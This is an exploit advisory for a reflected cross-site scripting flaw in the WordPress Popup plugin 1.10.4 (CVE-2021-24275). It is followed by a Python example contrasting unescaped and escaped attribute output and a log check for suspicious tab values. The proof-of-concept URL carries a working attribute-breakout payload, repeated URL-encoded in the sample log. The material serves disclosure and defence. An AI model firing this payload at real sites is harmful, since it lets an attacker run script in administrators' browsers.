WordPress Popup plugin version 1.10.4 suffers from a reflected cross-site scripting vulnerability.
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an HTML attribute, leading to a reflected Cross-Site Scripting issue.
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
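The defect class behind this advisory, shown as an added stand-alone example (Python, not the plugin's PHP and not the author's code): the same `tab` value written into an attribute verbatim versus attribute-escaped, an HTML parser showing which attributes a browser would actually see in each case, plus a simple check over access-log lines for `tab` values that are not plain identifiers. `KNOWN_TABS`, the function names, the `<input>` markup and the log lines are constructed for the example; `html.escape(quote=True)` stands in for WordPress's `esc_attr()`.

```python
"""Attribute-context reflected XSS (CVE-2021-24275 bug class), modelled
stand-alone so the vulnerable and hardened renderings can be compared."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed: the tab names a hypothetical options page actually defines.
KNOWN_TABS = ("general", "design", "statistics")


def tab_param(url: str) -> str:
    """Extract `tab` the way the server sees it (percent-decoded, '+' -> space)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("tab", [""])[0]


def render_vulnerable(tab: str) -> str:
    # The advisory's defect: the parameter lands inside an attribute unescaped,
    # so a leading quote closes the attribute and the rest becomes new ones.
    return f'<input type="hidden" name="tab" value="{tab}">'


def render_hardened(tab: str) -> str:
    # Attribute-context escaping; html.escape(quote=True) plays the role of
    # WordPress's esc_attr(). Quotes become &quot; and cannot end the value.
    return f'<input type="hidden" name="tab" value="{html.escape(tab, quote=True)}">'


def canonical_tab(tab: str) -> str:
    # Defence in depth: the page has a fixed set of tabs, so an unknown value
    # falls back to the default rather than being reflected at all.
    return tab if tab in KNOWN_TABS else KNOWN_TABS[0]


class _AttrCollector(HTMLParser):
    """Records the attribute names of the first start tag, i.e. what a
    browser would treat as attributes after any quote breakout."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if not self.attrs:
            self.attrs = [name for name, _ in attrs]


def attribute_names(markup: str) -> list:
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


# Detection: constructed access-log lines (not real traffic). A legitimate
# tab value is a short identifier; quotes, spaces or parentheses are not.
ACCESS_LOG = [
    '10.0.0.5 - - [28/Mar/2021:10:00:00 +0000] "GET /wp-admin/admin.php'
    '?page=popup-wp-supsystic&tab=design HTTP/1.1" 200 5120',
    '10.0.0.9 - - [28/Mar/2021:10:00:07 +0000] "GET /wp-admin/admin.php'
    '?page=popup-wp-supsystic&tab=%22+style%3Danimation-name%3Arotation'
    '+onanimationstart%3Dalert(/XSS/)// HTTP/1.1" 200 5120',
]
_REQUEST = re.compile(r'"GET (\S+) HTTP/')
_SAFE_TAB = re.compile(r"^[A-Za-z0-9_-]*$")


def suspicious_tab_requests(lines) -> list:
    """Return the decoded `tab` values that are not plain identifiers."""
    hits = []
    for line in lines:
        match = _REQUEST.search(line)
        if not match:
            continue
        tab = tab_param(match.group(1))
        if tab and not _SAFE_TAB.match(tab):
            hits.append(tab)
    return hits


if __name__ == "__main__":
    poc = ("/wp-admin/admin.php?page=popup-wp-supsystic&tab="
           '"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//')
    value = tab_param(poc)
    print("vulnerable:", attribute_names(render_vulnerable(value)))
    print("hardened:  ", attribute_names(render_hardened(value)))
    print("flagged:   ", suspicious_tab_requests(ACCESS_LOG))
```

Running the block prints the attribute list the parser recovers from each rendering: the vulnerable one gains `style` and `onanimationstart` attributes, the escaped one keeps only `type`, `name` and `value`. The log check is a coarse triage aid for the period before patching; it keys on the shape of the parameter, not on a specific payload string.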